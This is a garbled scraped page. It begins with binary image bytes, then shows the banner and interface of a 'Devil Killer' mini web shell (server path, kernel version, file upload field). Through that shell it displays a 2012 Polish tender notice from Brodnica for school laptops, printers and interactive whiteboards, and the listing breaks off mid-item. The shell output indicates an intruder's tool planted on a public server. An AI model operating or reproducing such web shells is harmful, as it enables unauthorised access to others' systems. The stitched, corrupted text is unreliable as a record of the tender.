JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/190311-N-2012.html

<p class="kh_header"><b>Brodnica: DOSTAWA Z MONTAŻEM POMOCY DYDAKTYCZNYCH I INNEGO SPRZĘTU NIEZBĘDNEGO DO REALIZACJI PROGRAMÓW NAUCZANIA Z WYKORZYSTANIEM TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH W RAMACH REALIZACJI RZĄDOWEGO PROGRAMU ROZWIJANIA KOMPETENCJI UCZNIÓW I NAUCZYCIELI W ZAKRESIE STOSOWANIA TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH - CYFROWA SZKOŁA</b><br>
<b>Numer ogłoszenia: 190311 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Brodnicy , ul. Kamionka 23, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4930300, faks 056 4982626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA Z MONTAŻEM POMOCY DYDAKTYCZNYCH I INNEGO SPRZĘTU NIEZBĘDNEGO DO REALIZACJI PROGRAMÓW NAUCZANIA Z WYKORZYSTANIEM TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH W RAMACH REALIZACJI RZĄDOWEGO PROGRAMU ROZWIJANIA KOMPETENCJI UCZNIÓW I NAUCZYCIELI W ZAKRESIE STOSOWANIA TECHNOLOGII INFORMACYJNO-KOMUNIKACYJNYCH - CYFROWA SZKOŁA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa z montażem pomocy dydaktycznych i innego sprzętu niezbędnego do realizacji programów nauczania z wykorzystaniem technologii informacyjno-komunikacyjnych w ramach realizacji Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno-komunikacyjnych - Cyfrowa szkoła.
2.  	Zamawiający wymaga, aby oferta była kompletna. Brak którejkolwiek z pozycji spowoduje odrzucenie oferty jako niekompletnej.
3. 	Przy określeniu przedmiotu zamówienia Zamawiający nie posłużył się symbolem producenta. Opisane poniżej wymagania wobec sprzętu mają jedynie na celu precyzyjne określenie przedmiotu zamówienia, dopuszczając jednocześnie składanie ofert o parametrach równoważnych.
4. Zamawiający dopuszcza zaoferowanie produktów równoważnych, pod warunkiem, iż oferowany sprzęt będzie zgodny z opisem Zamawiającego pod względem wszystkich parametrów technicznych oraz wymagań jakościowych. W przypadku wątpliwości Zamawiającego, co do zaoferowanego przez Wykonawcę przedmiotu zamówienia, to na Wykonawcy ciążyć będzie obowiązek udokumentowania spełniania niniejszych warunków. Parametry zaoferowanego sprzętu nie mogą być gorsze jakościowo niż parametry przedmiotu zamówienia wskazanego przez Zamawiającego. 
5.  Oferowany sprzęt musi być fabrycznie nowy, najwyższej jakości. Termin fabrycznie nowy użyty powyżej oznacza, iż wszystkie elementy, z których wyprodukowano przedmiot zamówienia nie były wcześniej używane.
6. Jeżeli dostarczony przedmiot zamówienia będzie uszkodzony, zamawiający ma prawo je zwrócić do Wykonawcy. Wykonawca dostarczy w zamian sprawny produkt w czasie 4 dni od daty otrzymania reklamacji. Reklamacja może być zgłaszana przez Zamawiającego drogą telefoniczną lub faksem.
7.   Dostawa będzie kontrolowana przez Zamawiającego.
8.  Wykonawca dostarczy towar własnym transportem, na własny koszt, w sposób zapewniający ich całość i nienaruszalność, w miejsce wskazane przez Zamawiającego.
9.   Szczegółowy opis przedmiotu zamówienia:
Przedmiotem zamówienia jest dostawa wraz z montażem pomocy dydaktycznych i innego sprzętu niezbędnego do realizacji programów nauczania z wykorzystaniem technologii informacyjno-komunikacyjnych dla Szkoły Podstawowej nr 7 w Zespole Szkół nr 1 im. Karola Wojtyły-Jana Pawła II w Brodnicy w ramach Rządowego programu rozwijania kompetencji uczniów i nauczycieli w zakresie stosowania technologii informacyjno-komunikacyjnych - Cyfrowa szkoła. 9.1. Wykaz sprzętu i oprogramowania
Nazwa	
Ilość	Wymagania wobec sprzętu
1	przenośny komputer dla ucznia	52	Procesor klasy x86 posiadający co najmniej dwa rdzenie, z których każdy posiada osobny komplet jednostek wykonawczych, taktowany zegarem co najmniej 2,4 GHz, , o wydajności  min 3200 pkt wg wyników testu Passmark CPUMark publikowanych na stronie http://www.cpubenchmark.net/cpu_list.php
	Płyta główna oparta na chipsecie rekomendowanym przez producenta procesora, zintegrowany komponent graficzny zgodny z DirectX 10.0 z minimum 256MB Video RAM
	Matryca co najmniej 14 HD LED (1366 x 768pix); kontrast 400:1, jasność min. 200 Wireless antena wbudowana w obudowę matrycy,
	Pamięć operacyjna 4GB (1x2GB) DDR3 1600MHz z możliwością rozbudowy do 8 GB;
	Dysk twardy 320 GB, 5400 rpm. Wyposażony w system bezpieczeństwa zapobiegający uszkodzeniu dysku poprzez parkowanie głowicy dysku w sytuacjach zagrożenia oraz system tłumienia (absorbowania) drgań;
	Karta graficzna zintegrowany komponent graficzny zgodny z DirectX 10.0 z minimum 256MB Video RAM, dopuszcza się układ korzystający z pamięci RAM, wyjscia D-SUB oraz Display Port, min np Intel HD Graphics 4000
	1 x Express Card/34 lub 54
	Napęd optyczny DVD-RW wbudowany;
	Karta sieciowa zintegrowana Gigabit Ethernet 10/100 Mbps;
	Karta dźwiękowa zintegrowana z płytą główną AC97, o parametrach porównywalnych z SoundBlaster, wbudowany mikrofon, wbudowane głośniki (stereo) 1,5Wat, dedykowane (zintegrowane) przyciski do podgłaśniania i ściszania oraz wyłączania (mute) dźwięku;
	Wymagane zintegrowane złącza 4x USB  ( w tym  min 1x USB 3.0 i 1x powered), 1 x monitor (DB-15), mini Display Port, , 1 x sieć (RJ-45),
	Dodatkowe interfejsy - WiFi Link 1000 (BGN) -wbudowany, zintegrowany z wbudowaną anteną; wbudowany przełącznik umozliwiający włączenie/wyłączenie WiFi
	Wskaźnik - TouchPad - Multi touchz dwoma przyciskami i TrackPoint (wymagany)
	Klawiatura odporna na zalanie.
	Bateria - 6 cell Li-Ion zapewniająca pracę minimum przez 6,5 godziny
	Zasilacz - zewnętrzny posiadający certyfikat bezpieczeństwa CE,110-240V,
	Czytnik kart pamięci - zintegrowany czytnik kart min 4 w 1 obsługujący karty typów : MMC,  SD, SDHC, SDXC
	Waga maksymalnie 2,35 kg z baterią oraz napędem optycznym
	Oprogramowanie dodatkowe - oprogramowanie producenta komputera, umożliwiające aktualizacje oprogramowania oraz skanowanie dysku z poziomu podsystemu bezpieczeństwa (nie systemu operacyjnego). Konieczna jest również możliwość dostępu do internetu z poziomu w/w podsystemu. Podsystem ten musi być kompatybilny z MS Active Directory. - Oprogramowanie służące do obsługi napędu DVD. - Oprogramowanie producenta komputera umożliwiające aktualizacje sterowników oraz podsystemu zabezpieczeń poprzez internet. - Oprogramowanie producenta komputera do wykonania kopii bezpieczeństwa systemu operacyjnego i danych użytkownika na dysku twardym, zewnętrznych dyskach, sieci, CD-ROM-ie oraz ich odtworzenie po ewentualnej awarii systemu operacyjnego bez potrzeby jego reinstalacji; - Oprogramowanie w wersji polskiej lub angielskiej
	Potwierdzające przyznane certyfikaty:, znak bezpieczeństwa CE, ISO9001:2000 producenta komputera. Komputer musi być zaprojektowany i wyprodukowany w całości przez jednego producenta oraz wszystkie elementy komputera muszą pochodzić od tego samego producenta lub być przez niego sygnowane (opatrzone jego numerem katalogowym);  Energy Star 5.0, Epeat Gold
	Podręcznik użytkownika w języku polskim
	zainstalowany system operacyjny, zgodny z wyspecyfikowanymi poniżej wymaganiami
	zainstalowany pakiet oprogramowania biurowego, zgodny z wyspecyfikowanymi poniżej wymaganiami
	zainstalowane oprogramowanie chroniące komputer w przypadku kradzieży
	zainstalowane oprogramowanie antywirusowe oraz chroniące komputer ucznia przed niepożądanymi treściami z Internetu
	zainstalowane oprogramowanie do zarządzania zestawem komputerów dla potrzeb edukacyjnych, wspierania prowadzenia zajęć z wykorzystaniem multimediów oraz systemem zbierania i  analizowania odpowiedzi
	nośnik recovery z obrazem oprogramowania pozwalający na odtworzenie i przywrócenie ustawień początkowych sprzętu
	torba
	myszka
	gwarancja na okres nie krótszy niż 3 lata 
2	przenośny komputer dla nauczyciela	8		Procesor klasy x86 posiadający co najmniej dwa rdzenie, z których każdy posiada osobny komplet jednostek wykonawczych, taktowany zegarem co najmniej 2,40 GHz, , co najmniej 3MB cache) o  wydajności wg wyników testu  Pasmark CPU Mark min 3200 przeprowadzonego przez Wykonawcę. 
Do oferty należy dołączyć wynik testu
	Płyta główna oparta na chipsecie rekomendowanym przez producenta procesora, zintegrowany komponent graficzny zgodny z DirectX 10.0 z minimum 256MB Video RAM
	Matryca 15,6 HD LED (1366 x 768pix); kontrast 500:1, jasność min. 220 Wireless antena wbudowana w obudowę matrycy,
	Pamięć RAM 4GB (1x4GB) DDR3 1600MHz z możliwością rozbudowy do 8 GB;
	Dysk twardy 500 GB, 5400 rpm. Wyposażony w system bezpieczeństwa zapobiegający uszkodzeniu dysku poprzez parkowanie głowicy dysku w sytuacjach zagrożenia oraz system tłumienia (absorbowania) drgań;
	Karta graficzna zintegrowany komponent graficzny zgodny z DirectX 10.0 z minimum 256MB Video RAM, dopuszcza się układ korzystający z pamięci RAM, wyjscia D-SUB oraz Display Port, min np Intel HD Graphics 4000
	1 x Express Card/34 lub 54
	Napęd optyczny DVD-RW wbudowany;
	Zintegrowana karta sieciowa Gigabit Ethernet 10/100 Mbps;
	Karta dźwiękowa zintegrowana z płytą główną AC97, o parametrach porównywalnych z SoundBlaster, wbudowany mikrofon, wbudowane głośniki (stereo) 1,5Wat, dedykowane (zintegrowane) przyciski do podgłaśniania i ściszania oraz wyłączania (mute) dźwięku;
	Wymagane zintegrowane złącza - 4x USB  ( w tym  min 1x USB 3.0 i 1x powered), 1 x monitor (DB-15), mini Display Port, , 1 x sieć (RJ-45),
	Wymagane zintegrowane interfejsy WiFi Link 1000 (BGN) wbudowany, zintegrowany z wbudowaną anteną; wbudowany przełącznik umozliwiający włączenie/wyłączenie WiFi, bluetooth 4.0 , możliwość zainstalowania wewnętrznego modemu HSDPA
	Wskaźnik TouchPad - Multi touch z dwoma przyciskami i TrackPoint (wymagany)
	Klawiatura odporna na zalanie.
	6 cell Li-Ion zapewniająca pracę minimum przez 6,5 godziny
	Zasilacz zewnętrzny posiadający certyfikat bezpieczeństwa CE,110-240V,
	Czytniki kart pamięci - zintegrowany czytnik kart min 4 w 1 obsługujący karty typów : MMC,  SD, SDHC, SDXC
	Waga maksymalnie 2,60 kg z baterią oraz napędem optycznym
	Oprogramowanie producenta komputera, umożliwiające aktualizacje oprogramowania oraz skanowanie dysku z poziomu podsystemu bezpieczeństwa (nie systemu operacyjnego). Konieczna jest również możliwość dostępu do internetu z poziomu w/w podsystemu. Podsystem ten musi być kompatybilny z MS Active Directory. - Oprogramowanie służące do obsługi napędu DVD. - Oprogramowanie producenta komputera umożliwiające aktualizacje sterowników oraz podsystemu zabezpieczeń poprzez internet. - Oprogramowanie producenta komputera do wykonania kopii bezpieczeństwa systemu operacyjnego i danych użytkownika na dysku twardym, zewnętrznych dyskach, sieci, CD-ROM-ie oraz ich odtworzenie po ewentualnej awarii systemu operacyjnego bez potrzeby jego reinstalacji; - Oprogramowanie w wersji polskiej lub angielskiej
	Atesty i standardy potwierdzające przyznane certyfikaty:, znak bezpieczeństwa CE, ISO9001:2000 producenta komputera. Komputer musi być zaprojektowany i wyprodukowany w całości przez jednego producenta oraz wszystkie elementy komputera muszą pochodzić od tego samego producenta lub być przez niego sygnowane (opatrzone jego numerem katalogowym);  Energy Star 5.0, Epeat Gold
	Podręcznik użytkownika w języku polskim
	zainstalowany system operacyjny zgodny z oddzielnie wyspecyfikowanymi wymaganiami
	zainstalowany pakiet oprogramowania biurowego, zgodny z oddzielnie wyspecyfikowanymi wymaganiami
	zainstalowane oprogramowanie antywirusowe oraz chroniące komputer nauczyciela przed niepożądanymi treściami z Internetu
	zainstalowane oprogramowanie chroniące komputer w przypadku kradzieży
	zainstalowane oprogramowanie do zarządzania zestawem komputerów dla potrzeb edukacyjnych, wspierania prowadzenia zajęć z wykorzystaniem multimediów oraz systemem zbierania i analizowania odpowiedzi
	zainstalowane oprogramowanie do obsługi tablicy interaktywnej i innych akcesoriów współpracujących z komputerem (np. wizualizer)
	nośnik recowery z obrazem oprogramowania pozwalający na odtwarzanie i przywrócenie ustawień początkowych sprzętu
	torba
	myszka
	gwarancja na okres nie krótszy niż 3 lata 
3	szafka do przechowywania i bezpiecznego przemieszczania pomiędzy salami lekcyjnymi przenośnych komputerów dla uczniów, posiadającą funkcję ładowania baterii	2		Szafka  mobilna do notebooków przeznaczona do przechowywania i łatwego transportowania na niewielkich odległościach komputerów przenośnych oraz do ładowania ich baterii
	Łączna moc wszystkich urządzeń podłączonych jednorazowo do instalacji elektrycznej w szafce do 2300W; maksymalny prąd 10A; urządzenie przystosowane do pracy z napięciem 230V
	Instalacja składająca się z demontowalnych listew przepięciowych z bezpiecznikiem automatycznym
	Ilość półek: 26 -  umożliwiająca przechowywanie 26 lub więcej urządzeń i ładowanie ich baterii
	Wymiary min: 80 x 120 x 132 (szer x dł x wys; cm), długość razem ze zwijadłem do kabli 140cm
	Wbudowane urządzenie przeznaczane do bezawaryjnego podłączenia do sieci elektrycznej budynku zestawu  informatycznego składającego się 26 sztuk komputerów wraz z zasilaczami do standardowego gniazda elektrycznego o natężeniu max 16A i zabezpieczające instalację elektryczną budynku przed przerwaniem dopływu prądu
	Otwierane  drzwi dwuskrzydłowe  umożliwiające wkładanie i wyjmowanie komputerów znajdujące się równolegle do siebie
	Materiał: blacha stalowa lakierowana proszkowo lub z laminowanej płyty
	4 kółka z czego minimum 2 z hamulcami
	Szafka musi posiadać atesty i klasyfikacje zgodne z Rozp. MSWia z 21.04.2006 r. w sprawie ochrony przeciwpożarowej budynków dotycząca miejsc użyteczności publicznej,
	gwarancja na okres nie krótszy niż 3 lata  
4	sieciowe urządzenie wielofunkcyjne umożliwiające co najmniej drukowanie, kopiowanie i skanowanie	2		urządzenie gotowe do pracy (wyposażone we wszystkie niezbędne do pracy elementy oraz materiały eksploatacyjne o standardowej wydajności)
	urządzenie wielofunkcyjne kolorowe
	technologia druku - laserowa lub LED
	rozdzielczość wydruku 2400x600 dpi
	prędkość druku min. 24 str./min. W trybie monochromatycznym i kolorowym
	format oryginału A4, format kopii A4-A6
	wbudowana karta sieciowa
	pamięć wbudowana min. 128 MB, rozszerzalna do min. 384MB
	obciążenie miesięczne min. 40000 stron
	automatyczny podajnik dokumentów o pojemności min. 35 arkuszy
	podajnik papieru na min. 250 arkuszy
	wyświetlacz LCD - menu w języku PL
	typy plików skanowania PDF, JPEG, TIFF, dupleks
	funkcje skanowania do: e-mail, FTP, SMB, TWAIN,
	gwarancja na okres nie krótszy niż 3 lata 
5	drukarka	2		urządzenie gotowe do pracy (wyposażone we wszystkie niezbędne do pracy elementy oraz materiały eksploatacyjne o standardowej wydajności)
	prędkość druku min. 24 str./min.
	maksymalne obciążenie miesięczne min 10000 str.
	wbudowany moduł automatycznego druku dwustronnego
	wbudowany interfejs sieciowy
	USB 2.0
	podajnik standardowy na 250 arkuszy
	obsługa systemów Windows XP, Vista, 7
	obsługa nośników druku o długości co najmniej 400 mm
	gwarancja na okres nie krótszy niż 3 lata
6	skaner	1	Typ skanera: stolikowy
Rozdzielczość min. 1200 dpi i 48-bitowa głębia koloru umożliwiają wierne skanowanie zdjęć 
Poziomy skali szarości: 256
Możliwość  obróbki dokumentów w postaci cyfrowej lub za pomocą technologii OCR przekształcanie dokumentów i artykułów w tekst do edycji - dołączone oprogramowanie OCR
 gwarancja na okres nie krótszy niż 3 lata
7	tablica interaktywna	3		Efektywna powierzchnia tablicy (obszar interaktywny), na której można dokonywać notatek, sterować pracą komputera i wyświetlać obraz z projektora minimum 156.5 cm × 117.2 cm 
(przekątna 77 cali - 195.6 cm).
	Powierzchnia tablicy twarda, odporna na uszkodzenia, dostosowana do projekcji i pisania po niej pisakami sucho ścieralnymi. Powierzchnia umożliwia również używanie magnesów w celu mocowania do jej powierzchni np. kartek (powierzchnia magnetyczna).
	Technologia - podczerwieni, wielodotykowa.
	Rozdzielczość tablicy nie mniej niż 32000 x 32000.
	Komunikacja tablicy z komputerem i zasilanie - za pomocą przewodu USB.
	Obsługa tablicy za pomocą załączonego pisaka i za pomocą palca.
	Pisak do obsługi tablicy bez elementów elektronicznych i mechanicznych. 
	Rozpoznawanie gestów wielodotyku: dotknięcie obiektu w dwóch punktach i obracanie punktów dotyku wokół środka - obracanie obiektu, dotknięcie obiektu w dwóch punktach i oddalanie lub przybliżanie punktów dotyku - zwiększanie i zmniejszanie obiektu, przesunięcie po powierzchni tablicy ze strony prawej na lewą - jeden slajd do przodu (jak przewracanie stron w książce), przesunięcie ze strony lewej na prawą - jeden slajd do tyłu (jak przewracanie stron w książce), szybkie przesunięcie w obie strony - potrząśnięcie - zgrupowanie zaznaczonych obiektów lub rozgrupowanie zaznaczonego obiektu.
	Autoryzowany przez producenta tablicy serwis w Polsce, certyfikowany zgodnie z normą ISO 9001:2000 lub ISO 9001:2008 w zakresie urządzeń audiowizualnych.
	Wraz z tablicą dostarczyć (w języku polskim) podręcznik użytkownika tablicy i przewodnik metodyczny dla nauczycieli dotyczący wykorzystywania tablicy w procesie dydaktycznym
	Polska wersja językowa oprogramowania.
	Możliwość wstawiania obiektów z wewnętrznej bazy programu obsługującego tablicę (np. obrazów, animacji, gotowych szablonów, widżetów (gadżetów) sieciowych
	Zabezpieczenie tworzonego dokumentu przed jego utratą poprzez automatyczne zapisywanie go o wybrany interwał czasu oraz odtwarzanie dokumentu po jego niekontrolowanym zamknięciu w sytuacji krytycznej wywołanej niestabilnością systemu.
	Importowanie i eksportowanie materiałów powstałych na tablicy w czasie zajęć (notatek, obiektów) w formacie Whiteboard Common File Format (CFF).
	Dostępna na stronie producenta aplikacja pozwalająca na dostęp do plików stworzonych za pomocą oprogramowania producenta tablicy bez konieczności instalowania go na komputerze. Aplikacja musi umożliwiać przeglądanie plików, wykonywanie w nich przygotowanych ćwiczeń interaktywnych, pisanie za pomocą pisaków po slajdach, wprowadzanie tekstu i zapis do pliku wprowadzonych zmian.
	Narzędzie do rysowania wielokątów foremnych od trójkąta do co najmniej piętnastokąta.
	Funkcja usuwania jednocześnie wszystkich zapisków i rysunków wprowadzonych na stronę za pomocą pisaków.
	Funkcja resetowania strony pozwalająca na przywrócenie stanu pojedynczego slajdu do postaci bezpośrednio po otwarciu pliku z dysku. Funkcja ta pozwala szybko rozpocząć pracę od nowa.
	Dostęp bezpośrednio z poziomu programu do obsługi tablicy do bazy gotowych lekcji z w języku polskim, ilustracji, zdjęć, reprodukcji, animacji i widżetów (gadżetów) sieciowych itp. dostępnej przez sieć Internet.
	Automatyczna optymalizacja wielkości wstawianych plików graficznych, co umożliwia szybsze i łatwiejsze przekazywanie materiałów edukacyjnych przez sieć np. pocztą elektroniczną, na stronach WWW itp.
	Oprogramowanie umożliwia wyświetlanie stron w trybie pokazu (pełnoekranowym) ze zminimalizowanymi paskami narzędziowymi, podobnie jak w popularnych programach prezentacyjnych np. Microsoft PowerPoint.
	Możliwość wyświetlania dwóch slajdów (stron) jednocześnie np. w celu możliwości prezentacji treści zadania, danych, założeń i jego rozwiązania w przypadku gdy nie mieszczą się na jednej stronie.
	Wyszukiwarka wewnętrznej galerii oprogramowania do obsługi tablicy umożliwiająca szybkie i sprawne odnajdowanie interesujących materiałów poprzez słowa kluczowe.
	Pióro kaligraficzne - narzędzie automatycznie wygładza kreskę w czasie pisania lub rysowania w celu poprawienia czytelności zapisków lub rysunków.
	Pióro typu kredka świecowa- narzędzie pozwalające uzyskać rysunki lub notatki wykonane przy pomocy kredek świecowych. 
	Pióro kreatywne - narzędzie umożliwiające pisanie i rysowane dowolnymi kształtami (np. gwiazdki, kwiatki itp.). Użytkownik może dostosować pióro kreatywne do swoich potrzeb poprzez wybranie dowolnego kształtu, który jest obiektem znajdującym się na slajdzie lub plikiem graficznym.
	Oprogramowanie do obsługi tablicy posiada własną przeglądarką internetową, którą można wstawić bezpośrednio do slajdu. Przenoszenie poprzez mechanizm przeciągnij i upuść grafiki oraz zaznaczonych fragmentów tekstów bezpośrednio z treści strony internetowej na slajd bez konieczności opuszczania okna z tym slajdem. Przeglądarka może automatycznie załadować wskazaną wcześniej przez użytkownika stronę po wyświetleniu slajdu z wstawioną przeglądarką.
	Możliwość umieszczania na slajdach widżetów (gadżetów) sieciowych.
	Generator ćwiczeń wykorzystujący obiekty umieszczone na slajdzie, które mogą oddziaływać na siebie i w ten sposób tworzyć gry lub ćwiczenia interaktywne.
	Możliwość przypisania do każdego obiektu na slajdzie dźwięku, który może być uruchamiany poprzez dotknięcie obiektu lub narożnika obiektu oznaczonego ikoną. Przypisany dźwięk może pochodzić z dysku jako plik w formacie mp3 lub może zostać nagrany bezpośrednio w oprogramowaniu tablicy za pomocą mikrofonu podłączonego do komputera.
	Możliwość uruchomienia trybu przeźroczyste tło pozwalającego na wykorzystanie obiektów z galerii, wykonywania notatek i rysunków cyfrowym atramentem (zachowując możliwości przenoszenia, zmiany rozmiaru i obrotu obiektów) przy jednoczesnym używaniu i sterowaniu oprogramowaniem edukacyjnym, aplikacjami i systemem operacyjnym. Po wyjściu z ww. trybu wszystkie naniesione obiekty i notatki pozostają na slajdzie
	Możliwość pisania i rysowania po plikach PDF. Po naniesieniu notatek i rysunków możliwość zapisu całości do pliku PDF.
	możliwość instalacji oprogramowania na dowolnej liczbie komputerów będących w dyspozycji szkoły
	możliwość instalacji oprogramowania przez nauczycieli i uczniów na ich prywatnych komputerach
	bezpłatny i nieograniczony czasowo dostęp do aktualizacji i nowych wersji oprogramowania
	wpisywanie i zachowywanie notatek wykonanych przy pomocy tablicy w plikach popularnych aplikacji (przynamniej: MS Word, MS Excel, MS PowerPoint). Możliwość późniejszej edycji dokonanych wpisów i notatek w plikach za pomocą tych popularnych aplikacji
	konieczność działania oprogramowania tablicy z systemem operacyjnym na komputerach nauczycielskich i komputerach uczniowskich 
	dostarczenie z tablicą interaktywną  oprogramowania edukacyjnego na etap edukacyjny klasy 4 szkoły podstawowej - oprogramowania edukacyjnego np. programów interaktywnych do nauczania przedmiotów j. polskiego, j. angielskiego, matematyki, przyrody, historii, techniki, informatyki 
	gwarancja na okres nie krótszy niż 5 lat
8	system mocowania tablicy interaktywnej	3		prawidłowy montaż tablicy interaktywnej, jej prawidłowe działanie, bezpieczeństwo i stabilność, dodatkowo ukrycie kabli i zapewnienie wygody eksploatacji, zastosowanie gniazd puszek do sterowania tablicą, rzutnikiem i głośnikami
	sposób montażu tablicy - na ścianie na uchwytach zalecanych przez producenta  - integracja z  projektorem  i głośnikami dostosowanymi do typu tablicy
	gwarancja na okres nie krótszy niż 3 lata
9	urządzenia i oprogramowanie do przeprowadzenia wideokonferencji	3		zestawy kamer IP min. rozdzielczość 800x600 - (w zestawie dwie kamery)
oprogramowanie do przesyłania danych Audio/Video
	gwarancja na okres nie krótszy niż 3 lata
10	system do zbierania i analizowania odpowiedzi	3	Oprogramowanie komputera nauczyciela
Zarządzanie 
	możliwość pracy offline - poza aktywną lekcją
